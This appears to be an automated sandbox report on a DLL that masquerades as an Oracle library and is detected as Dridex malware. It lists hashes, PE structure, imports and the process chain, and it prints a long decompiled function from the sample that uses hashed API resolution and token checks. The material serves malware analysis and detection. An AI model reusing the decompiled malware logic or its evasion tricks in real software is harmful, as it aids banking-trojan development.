Preview:	regfV...V...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm....................................................................................................................................................................................................................................................................................................................................................1.._........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1 Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	3.5165609308437173
Encrypted:	false
SSDEEP:	384:JSb5VnIrnc82TVgG9K0XOmnQMR9ovOgl5:wlpAc8UVgGs0XVnQMEvP
MD5:	4A5692F77C142A5C921951F412C73996
SHA1:	118246C8365CADD57FCF448B9D491BAD688E70E8
SHA-256:	84058CF94519C692DCBC143DCB31998D33CFC649A143071E5373984EA6CD7468
SHA-512:	BC4DD6F71ABDA3C55F285B47B9264228A15098507D827C38880ABF840EB265A63220C1F99C021019C85034D1B2B5B85AEFAD2A8B1F80264B5CE754BD750B4219
Malicious:	false
Reputation:	low
Preview:	regfU...U...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm....................................................................................................................................................................................................................................................................................................................................................7.._HvLE.N......U...........N..............................`... ..hbin................p.\..,..........nk,..L..........@........................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ..L.......... ........................... .......Z.......................Root........lf......Root....nk ..L.......................}.............. ...............*...............DeviceCensus........................vk..................WritePermissionsCheck.......p...

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.341894166997632
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Pv3ZsGsdfS.dll
File size:	565248
MD5:	63c22ce32346e029fa5a1ec1ae619d0f
SHA1:	222cf86c3b59f466292bb734be308cda77c3ddff
SHA256:	efbd76616dc1cd8210a8c54611f4ffa88e635f0f6ded2f8ff48311737635edda
SHA512:	413efdf48b13d8cd6cb9f799215a7c34588995ba5f48c4db855ad332c3b4b6b7c753ff361d0cd850a728ec68c76b47e96aaac604f3bdb069920d930c422bd0f4
SSDEEP:	12288:jGBK1zWlDqhPUVpqF9q9FAfPWvF+r3qTFCX1za7EV8RgfQOOvDC93:jNkIu2KAGIOwZ+v
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R...<...<...<..k....<...=.S.<.=.....<.......<.......<.t.?...<.t.=.4.<.L.9...<.t...0.<..k....<..0..x.<.......<..1....<..k....<

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10005a80
Entrypoint Section:	.rdata
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x61C43E40 [Thu Dec 23 09:15:44 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	7119acbff3b38a52756367cf5bfb78f2

Entrypoint Preview

Instruction
inc eax
mov edx, 00000003h
cmpps xmm1, xmm0, 02h
jmp 00007F39491594D6h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push ebx
push edi
and esp, FFFFFFF8h
sub esp, 000000E8h
lea eax, dword ptr [esp+00000084h]
lea ecx, dword ptr [esp+23h]
mov word ptr [esp+000000D4h], 0F55h
mov edx, dword ptr [esp+000000CCh]
mov esi, edx
or esi, esi
mov dword ptr [esp+000000CCh], esi
mov byte ptr [esp+000000CBh], 0000000Eh
mov word ptr [esp+000000D2h], EED6h
mov dword ptr [esp+000000C4h], 00440CD0h
mov word ptr [esp+66h], C76Dh
mov bl, byte ptr [esp+000000D7h]
mov di, word ptr [esp+66h]
mov byte ptr [eax+eax+00000000h], bl

Rich Headers

Programming Language:

[IMP] VS2015 UPD1 build 23506
[C++] VS2012 UPD1 build 51106
[ASM] VS2012 build 50727
[ASM] VS2012 UPD2 build 60315
[LNK] VS2010 SP1 build 40219
[EXP] VS2010 SP1 build 40219
[RES] VS2015 UPD1 build 23506
[IMP] VS2010 build 30319
[ASM] VS2015 UPD1 build 23506
[C++] VS2017 v15.5.4 build 25834
[EXP] VS2012 UPD4 build 61030
[C++] VS2008 build 21022
[ASM] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x81079	0x60	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x810dc	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x89000	0x2f0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8a000	0x1138	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x6030	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x44	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.rdata	0x1000	0x699e	0x7000	False	0.390206473214	data	4.46675995806	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x79ed0	0x7a000	False	0.303953076972	data	7.45734301056	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x82000	0x6178	0x5000	False	0.246435546875	data	5.05789801748	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x89000	0x2f0	0x1000	False	0.090087890625	data	0.791740378228	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8a000	0x1138	0x2000	False	0.242065429688	data	4.12259394173	IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x89060	0x290	MS Windows COFF PA-RISC object file	English	United States

Imports

DLL	Import
KERNEL32.dll	GetModuleHandleW, CloseHandle, IsDebuggerPresent, OutputDebugStringA, GetModuleFileNameW, GetFileSize
ADVAPI32.dll	AccessCheck, RegCloseKey, QueryServiceStatus
USER32.dll	GetWindowTextA
WINSPOOL.DRV	EnumFormsW
WS2_32.dll	WSACleanup

Version Infos

Description	Data
OriginalFilename	Shi.dll
FileDescription	Oracle Call Interface
FileVersion	2.9.9.7.0
Legal Copyright	Copyright Oracle Corporation 1979, 2001. All rights reserved.
CompanyName	Oracle Corporation
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6836 Parent PID: 5528

General

Start time:	09:23:42
Start date:	24/12/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\Pv3ZsGsdfS.dll"
Imagebase:	0xb90000
File size:	116736 bytes
MD5 hash:	7DEB5DB86C0AC789123DEC286286B938
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000002.749937166.000000006F4B1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 6852 Parent PID: 6836

General

Start time:	09:23:43
Start date:	24/12/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Pv3ZsGsdfS.dll",#1
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6900 Parent PID: 6852

General

Start time:	09:23:43
Start date:	24/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\Pv3ZsGsdfS.dll",#1
Imagebase:	0xe70000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000000.360348773.000000006F4B1000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000000.358630922.000000006F4B1000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000002.401542049.000000006F4B1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 7008 Parent PID: 6900

General

Start time:	09:23:47
Start date:	24/12/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6900 -s 684
Imagebase:	0xa20000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 6836 Parent PID: 5528 loaddll32.exeCOMMON

Executed Functions

Function 6F4C0730, Relevance: 5.2, APIs: 3, Instructions: 650
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E6F4C0730(void* __ecx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t155;
				signed char* _t159;
				char _t162;
				void* _t180;
				intOrPtr _t189;
				char _t190;
				intOrPtr _t196;
				intOrPtr _t200;
				void* _t203;
				void* _t212;
				void* _t213;
				void* _t215;
				void* _t216;
				void* _t223;
				void* _t238;
				void* _t241;
				void* _t244;
				void* _t247;
				void* _t250;
				void* _t254;
				void* _t259;
				void* _t265;
				void* _t268;
				int _t271;
				void* _t272;
				void* _t276;
				void* _t277;
				void* _t278;
				void* _t282;
				int _t288;
				intOrPtr* _t291;
				signed char _t294;
				signed char _t295;
				intOrPtr* _t320;
				intOrPtr* _t325;
				intOrPtr* _t363;
				char _t364;
				intOrPtr* _t372;
				void* _t377;
				void* _t382;
				void* _t383;
				void* _t384;
				void* _t385;
				void* _t386;
				void* _t387;
				void* _t393;
				void* _t395;
				void* _t401;
				void* _t403;
				intOrPtr* _t404;
				signed int _t406;
				intOrPtr* _t409;
				void* _t411;
				signed int _t413;
				void* _t414;
				void* _t415;
				void* _t420;
				intOrPtr* _t423;
				void* _t425;
				void** _t427;
				void* _t428;
				void* _t429;

				_t414 = __ecx;
				_t155 =  *0x6f4cd1f8;
				if(_t155 == 0x4c71e88d) {
					_t155 = E6F4C361C(0x30);
					 *0x6f4cd1f8 = _t155;
				}
				if( *((char*)(_t155 + 0xb)) == 0 || _t414 != 0) {
					_t415 = _t428 + 0x48;
					E6F4C3698(_t415, 0, 0x11c);
					_t429 = _t428 + 0xc;
					 *((intOrPtr*)(_t429 + 0x48)) = 0x11c;
					if(E6F4C306C(0x8e844d1e, 0xcf311107, 0x8e844d1e, 0x8e844d1e) != 0) {
						_push(_t415);
						asm("int3");
						asm("int3");
					}
					_t404 =  *0x6f4cd1f8;
					_t159 = _t429 + 0x4c;
					_t294 =  *_t159;
					 *(_t404 + 8) = _t294;
					_t295 = _t159[4];
					 *(_t404 + 9) = _t295;
					 *((char*)(_t404 + 0xa)) = _t159[0x110];
					 *((intOrPtr*)(_t404 + 4)) =  *((intOrPtr*)(_t429 + 0x54));
					 *((char*)(_t404 + 0xc)) = 0 | _t159[0x116] != 0x00000001;
					 *_t404 = (_t295 & 0x000000ff) + ((_t294 & 0x000000ff) << 4) - 0x50;
					_t162 = E6F4C0FF8(_t404);
					 *(_t429 + 0x198) = 0;
					 *((char*)( *0x6f4cd1f8 + 0xb)) = _t162;
					_t363 = E6F4C306C(0x150c05fc, 0x1da4d409, _t162, _t162);
					if(_t363 == 0) {
						L12:
						_t364 = 0;
						L13:
						 *((char*)( *0x6f4cd1f8 + 0x28)) = _t364;
						if( *((intOrPtr*)(E6F4C0730(0))) >= 0x10) {
							_push(6);
							memcpy(_t429 + 0x164, 0x6f4cbce0, 0 << 2);
							_t429 = _t429 + 0xc;
							 *((intOrPtr*)(_t429 + 0x1c)) = 0;
							E6F4BF584(_t429 + 0x24, 0);
							_t406 = 0;
							__eflags = 0;
							do {
								E6F4BF828(_t429 + 0x24, E6F4BF4CC(_t429 + 0x20) + 4);
								 *((intOrPtr*)(E6F4BF4BC(_t429 + 0x24, E6F4BF4CC(_t429 + 0x20) + 0xfffffffc))) =  *((intOrPtr*)(_t429 + 0x164 + _t406 * 4));
								_t406 = _t406 + 1;
								 *((intOrPtr*)(_t429 + 0x1c)) =  *((intOrPtr*)(_t429 + 0x1c)) + 1;
								__eflags = _t406 - 6;
							} while (_t406 < 6);
							_push(0);
							E6F4C5580(_t429 + 0xc, _t429 + 0x1c, 0x80000002);
							E6F4BF654(_t429 + 0x20);
							E6F4C55B0(_t429 + 8, _t429 + 0x1c0, 0xc0092a94);
							_t180 = E6F4C5864(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c0)));
							_t407 = _t180;
							E6F4BDFA4(_t429 + 0x1c0);
							__eflags = _t180;
							if(_t180 != 0) {
								E6F4C55B0(_t429 + 8, _t429 + 0x1c8, 0x1e55aaec);
								_t420 = E6F4C5864(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c8)));
								E6F4BDFA4(_t429 + 0x1c8);
								_t407 = _t429 + 0x1d0;
								E6F4C55B0(_t429 + 8, _t429 + 0x1d0, 0x360d0c74);
								_t401 = E6F4C5864(_t429 + 4, __eflags,  *(_t429 + 0x1d0));
								E6F4BDFA4(_t429 + 0x1d0);
								__eflags = _t420;
								if(_t420 != 0) {
									__eflags = _t420 - 5;
									if(_t420 != 5) {
										__eflags = _t420 - 2;
										if(_t420 != 2) {
											L58:
											E6F4BCFDC(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L65:
												_t189 = 0;
												__eflags = 0;
												 *(_t429 + 4) = 0;
												goto L66;
											}
											_t382 =  *(_t429 + 4);
											__eflags = _t382;
											if(_t382 == 0) {
												L61:
												_t238 = 1;
												L63:
												__eflags = _t238;
												if(_t238 == 0) {
													E6F4C5558(_t382);
												}
												goto L65;
											}
											__eflags = _t382 - 0xffffffff;
											if(_t382 != 0xffffffff) {
												_t238 = 0;
												__eflags = 0;
												goto L63;
											}
											goto L61;
										}
										__eflags = _t401 - 1;
										if(_t401 != 1) {
											goto L58;
										}
										E6F4BCFDC(_t429 + 0xc);
										__eflags =  *((char*)(_t429 + 8));
										if( *((char*)(_t429 + 8)) == 0) {
											L57:
											 *(_t429 + 4) = 0;
											_t189 = 5;
											goto L66;
										}
										_t383 =  *(_t429 + 4);
										__eflags = _t383;
										if(_t383 == 0) {
											L53:
											_t241 = 1;
											L55:
											__eflags = _t241;
											if(_t241 == 0) {
												E6F4C5558(_t383);
											}
											goto L57;
										}
										__eflags = _t383 - 0xffffffff;
										if(_t383 != 0xffffffff) {
											_t241 = 0;
											__eflags = 0;
											goto L55;
										}
										goto L53;
									}
									__eflags = _t401;
									if(_t401 != 0) {
										__eflags = _t401 - 1;
										if(_t401 == 1) {
											E6F4BCFDC(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L121:
												 *(_t429 + 4) = 0;
												_t189 = 4;
												goto L66;
											}
											_t384 =  *(_t429 + 4);
											__eflags = _t384;
											if(_t384 == 0) {
												L117:
												_t244 = 1;
												L119:
												__eflags = _t244;
												if(_t244 == 0) {
													E6F4C5558(_t384);
												}
												goto L121;
											}
											__eflags = _t384 - 0xffffffff;
											if(_t384 != 0xffffffff) {
												_t244 = 0;
												__eflags = 0;
												goto L119;
											}
											goto L117;
										}
										goto L58;
									}
									E6F4BCFDC(_t429 + 0xc);
									__eflags =  *((char*)(_t429 + 8));
									if( *((char*)(_t429 + 8)) == 0) {
										L45:
										 *(_t429 + 4) = 0;
										_t189 = 3;
										goto L66;
									}
									_t385 =  *(_t429 + 4);
									__eflags = _t385;
									if(_t385 == 0) {
										L41:
										_t247 = 1;
										L43:
										__eflags = _t247;
										if(_t247 == 0) {
											E6F4C5558(_t385);
										}
										goto L45;
									}
									__eflags = _t385 - 0xffffffff;
									if(_t385 != 0xffffffff) {
										_t247 = 0;
										__eflags = 0;
										goto L43;
									}
									goto L41;
								}
								__eflags = _t401;
								if(_t401 != 0) {
									goto L58;
								}
								E6F4BCFDC(_t429 + 0xc);
								__eflags =  *((char*)(_t429 + 8));
								if( *((char*)(_t429 + 8)) == 0) {
									L35:
									 *(_t429 + 4) = 0;
									_t189 = 2;
									goto L66;
								}
								_t386 =  *(_t429 + 4);
								__eflags = _t386;
								if(_t386 == 0) {
									L31:
									_t250 = 1;
									L33:
									__eflags = _t250;
									if(_t250 == 0) {
										E6F4C5558(_t386);
									}
									goto L35;
								}
								__eflags = _t386 - 0xffffffff;
								if(_t386 != 0xffffffff) {
									_t250 = 0;
									__eflags = 0;
									goto L33;
								}
								goto L31;
							}
							E6F4BCFDC(_t429 + 0xc);
							__eflags =  *((char*)(_t429 + 8));
							if( *((char*)(_t429 + 8)) == 0) {
								L25:
								 *(_t429 + 4) = 0;
								_t189 = 1;
								goto L66;
							}
							_t387 =  *(_t429 + 4);
							__eflags = _t387;
							if(_t387 == 0) {
								L21:
								_t254 = 1;
								L23:
								__eflags = _t254;
								if(_t254 == 0) {
									E6F4C5558(_t387);
								}
								goto L25;
							}
							__eflags = _t387 - 0xffffffff;
							if(_t387 != 0xffffffff) {
								_t254 = 0;
								__eflags = 0;
								goto L23;
							}
							goto L21;
						} else {
							_t189 = 1;
							L66:
							 *((intOrPtr*)( *0x6f4cd1f8 + 0x24)) = _t189;
							_t190 = E6F4C1030(0xffffffffffffffff);
							_t320 =  *0x6f4cd1f8;
							 *((char*)(_t320 + 0x29)) = _t190;
							 *((intOrPtr*)(_t320 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
							if( *_t320 >= 0x10) {
								__eflags = 0xffffffffffffffff;
								 *((intOrPtr*)( *0x6f4cd1f8 + 0x2c)) = E6F4C10A4(0x6f4cd1f8, 0xffffffffffffffff);
								L78:
								if(E6F4C306C(0x8e844d1e, 0x925d7fea, 0x8e844d1e, 0x8e844d1e) != 0) {
									GetSystemInfo(_t429 + 0x164); // executed
								}
								_t196 =  *0x6f4cd1f8;
								_t291 = _t429 + 0x178;
								_t409 = _t429 + 0x170;
								 *((short*)(_t196 + 0xe)) =  *_t291;
								 *((intOrPtr*)(_t196 + 0x10)) =  *((intOrPtr*)(_t291 - 0x10));
								 *((intOrPtr*)(_t196 + 0x14)) =  *((intOrPtr*)(_t291 - 0xc));
								 *((intOrPtr*)(_t196 + 0x18)) =  *_t409;
								 *((intOrPtr*)(_t196 + 0x1c)) =  *((intOrPtr*)(_t409 + 0x10));
								return _t196;
							}
							 *(_t429 + 0x19c) = 0;
							_t372 = E6F4C306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
							if(_t372 == 0) {
								L74:
								_t200 =  *0x6f4cd1f8;
								if( *((char*)(_t200 + 0x28)) == 0) {
									 *((intOrPtr*)(_t200 + 0x2c)) = 3;
								} else {
									 *((intOrPtr*)(_t200 + 0x2c)) = 5;
								}
								goto L78;
							}
							_push(_t429 + 0x19c);
							_push(8);
							_push(0xffffffff);
							if( *_t372() == 0) {
								_t203 = E6F4C35F0(_t407);
								__eflags = _t203;
								if(_t203 != 0) {
									goto L74;
								}
							}
							 *(_t429 + 0x30) =  *(_t429 + 0x19c);
							 *((char*)(_t429 + 0x34)) = 1;
							 *(_t429 + 0x1a4) = 0;
							_t325 = E6F4C306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
							if(_t325 != 0) {
								_push(_t429 + 0x1a4);
								_push(0);
								_push(0);
								_push(1);
								_push( *(_t429 + 0x1ac));
								if( *_t325() == 0) {
									E6F4C35F0(_t407);
								}
							}
							_t206 =  *(_t429 + 0x1a4);
							if( *(_t429 + 0x1a4) != 0) {
								E6F4BF584(_t429 + 0x18c, _t206);
								_t411 = E6F4C306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
								__eflags = _t411;
								if(_t411 == 0) {
									L133:
									E6F4BF654(_t429 + 0x188);
									goto L72;
								}
								_t212 = E6F4BF4BC(_t429 + 0x18c, 0);
								_t213 = E6F4BF4CC(_t429 + 0x188);
								_t215 =  *_t411( *(_t429 + 0x1ac), 1, _t212, _t213, _t429 + 0x1a4);
								__eflags = _t215;
								if(_t215 == 0) {
									_t216 = E6F4C35F0(_t411);
									__eflags = _t216;
									if(_t216 != 0) {
										goto L133;
									}
								}
								_t423 = E6F4BF4BC(_t429 + 0x18c, 0);
								E6F4BDF4C(_t429 + 0x1b4, 0);
								 *(_t429 + 0x1ac) = 0;
								_t377 = E6F4C306C(0x150c05fc, 0xfc1a24a1, 0x150c05fc, 0x150c05fc);
								__eflags = _t377;
								if(_t377 != 0) {
									 *_t377( *_t423, _t429 + 0x1ac);
								}
								E6F4BDFC0(_t429 + 0x1b4,  *(_t429 + 0x1ac));
								_t223 = E6F4C306C(0x8e844d1e, 0xda6a2597, 0x8e844d1e, 0x8e844d1e);
								__eflags = _t223;
								if(_t223 != 0) {
									_push( *(_t429 + 0x1ac));
									asm("int3");
									asm("int3");
								}
								E6F4BE06C(_t429 + 0x1b8 - 8, _t429 + 0x1b8);
								_t425 = E6F4C4FFC( *((intOrPtr*)(_t429 + 0x1b8)), E6F4BE8A8( *((intOrPtr*)(_t429 + 0x1b8)), 0x7fffffff));
								E6F4BDFA4(_t429 + 0x1b8);
								E6F4BDFA4(_t429 + 0x1b0);
								E6F4BF654(_t429 + 0x188);
								__eflags =  *((char*)(_t429 + 0x34));
								if( *((char*)(_t429 + 0x34)) != 0) {
									E6F4BBB44(_t429 + 0x30);
								}
								__eflags = _t425 - 0x6df4cf7;
								if(_t425 != 0x6df4cf7) {
									goto L74;
								} else {
									 *((intOrPtr*)( *0x6f4cd1f8 + 0x2c)) = 6;
									goto L78;
								}
							} else {
								L72:
								if( *((char*)(_t429 + 0x34)) != 0) {
									E6F4BBB44(_t429 + 0x30);
								}
								goto L74;
							}
						}
					}
					_push(_t429 + 0x198);
					_push(8);
					_push(0xffffffff);
					if( *_t363() == 0) {
						_t259 = E6F4C35F0(_t404);
						__eflags = _t259;
						if(_t259 != 0) {
							goto L12;
						}
					}
					 *(_t429 + 0x14) =  *(_t429 + 0x198);
					 *((char*)(_t429 + 0x18)) = 1;
					 *(_t429 + 0x1a0) = 0;
					if(E6F4C306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) != 0) {
						_t288 = GetTokenInformation( *(_t429 + 0x1a8), 2, 0, 0, _t429 + 0x1a0); // executed
						if(_t288 == 0) {
							E6F4C35F0(_t404);
						}
					}
					_t262 =  *(_t429 + 0x1a0);
					if( *(_t429 + 0x1a0) != 0) {
						E6F4BF584(_t429 + 0x3c, _t262);
						_t265 = E6F4C306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
						_t407 = _t265;
						__eflags = _t265;
						if(_t265 == 0) {
							L107:
							E6F4BF654(_t429 + 0x38);
							goto L10;
						}
						_t268 = E6F4BF4BC(_t429 + 0x3c, 0);
						_t271 = GetTokenInformation( *(_t429 + 0x1a8), 2, _t268, E6F4BF4CC(_t429 + 0x38), _t429 + 0x1a0); // executed
						__eflags = _t271;
						if(_t271 == 0) {
							_t272 = E6F4C35F0(_t407);
							__eflags = _t272;
							if(_t272 != 0) {
								goto L107;
							}
						}
						_t427 = E6F4BF4BC(_t429 + 0x3c, 0);
						 *(_t429 + 0x1d8 - 0x30) = 0;
						asm("movsd");
						asm("movsb");
						asm("movsb");
						_t407 = E6F4C306C(0x150c05fc, 0x2351aaca, 0x150c05fc, 0x150c05fc);
						__eflags = _t407;
						if(_t407 == 0) {
							goto L107;
						}
						_t276 = _t429 + 0x1a8;
						_t277 =  *_t407(_t276 + 0x30, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t276);
						__eflags = _t277;
						if(_t277 == 0) {
							_t278 = E6F4C35F0(_t407);
							__eflags = _t278;
							if(_t278 != 0) {
								goto L107;
							}
						}
						_t403 =  *(_t429 + 0x1a8);
						__eflags =  *_t427;
						if( *_t427 <= 0) {
							L101:
							__eflags = _t403;
							if(_t403 == 0) {
								L103:
								_t393 = 1;
								L105:
								__eflags = _t393;
								if(_t393 == 0) {
									E6F4C0FD4(_t403, _t407, _t403);
								}
								goto L107;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t393 = 0;
								__eflags = 0;
								goto L105;
							}
							goto L103;
						}
						_t413 = 0;
						__eflags = 0;
						do {
							_t282 = E6F4C306C(0x150c05fc, 0xb4757511, 0x150c05fc, 0x150c05fc);
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							_push( *((intOrPtr*)(_t427 + 4 + _t413 * 8)));
							_push( *(_t429 + 0x1ac));
							asm("int3");
							asm("int3");
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							__eflags = _t403;
							if(_t403 == 0) {
								L93:
								_t395 = 1;
								L95:
								__eflags = _t395;
								if(_t395 == 0) {
									E6F4C0FD4(_t403, _t413, _t403);
								}
								E6F4BF654(_t429 + 0x38);
								__eflags =  *((char*)(_t429 + 0x18));
								if( *((char*)(_t429 + 0x18)) != 0) {
									E6F4BBB44(_t429 + 0x14);
								}
								_t364 = 1;
								goto L13;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t395 = 0;
								__eflags = 0;
								goto L95;
							}
							goto L93;
							L100:
							_t413 = _t413 + 1;
							__eflags = _t413 -  *_t427;
						} while (_t413 <  *_t427);
						goto L101;
					}
					L10:
					if( *((char*)(_t429 + 0x18)) != 0) {
						E6F4BBB44(_t429 + 0x14);
					}
					goto L12;
				} else {
					return _t155;
				}
			}

0x6f4c073f
0x6f4c0741
0x6f4c0748
0x6f4c0fc7
0x6f4c0fcd
0x6f4c0fcd
0x6f4c0752
0x6f4c075e
0x6f4c076a
0x6f4c076f
0x6f4c077c
0x6f4c078d
0x6f4c078f
0x6f4c0790
0x6f4c0791
0x6f4c0791
0x6f4c0792
0x6f4c0796
0x6f4c079a
0x6f4c079f
0x6f4c07a2
0x6f4c07a8
0x6f4c07c2
0x6f4c07c9
0x6f4c07cc
0x6f4c07cf
0x6f4c07d1
0x6f4c07dd
0x6f4c07ea
0x6f4c07f7
0x6f4c07fb
0x6f4c0887
0x6f4c0887
0x6f4c0889
0x6f4c088d
0x6f4c0898
0x6f4c08ae
0x6f4c08b1
0x6f4c08b1
0x6f4c08b5
0x6f4c08be
0x6f4c08c3
0x6f4c08c3
0x6f4c08c5
0x6f4c08d6
0x6f4c08f8
0x6f4c08fa
0x6f4c08fb
0x6f4c08ff
0x6f4c08ff
0x6f4c0908
0x6f4c0914
0x6f4c091d
0x6f4c0933
0x6f4c0943
0x6f4c0948
0x6f4c094c
0x6f4c0951
0x6f4c0953
0x6f4c09a3
0x6f4c09b8
0x6f4c09bc
0x6f4c09c1
0x6f4c09d2
0x6f4c09e7
0x6f4c09eb
0x6f4c09f0
0x6f4c09f2
0x6f4c0a39
0x6f4c0a3c
0x6f4c0a8a
0x6f4c0a8d
0x6f4c0ace
0x6f4c0ad2
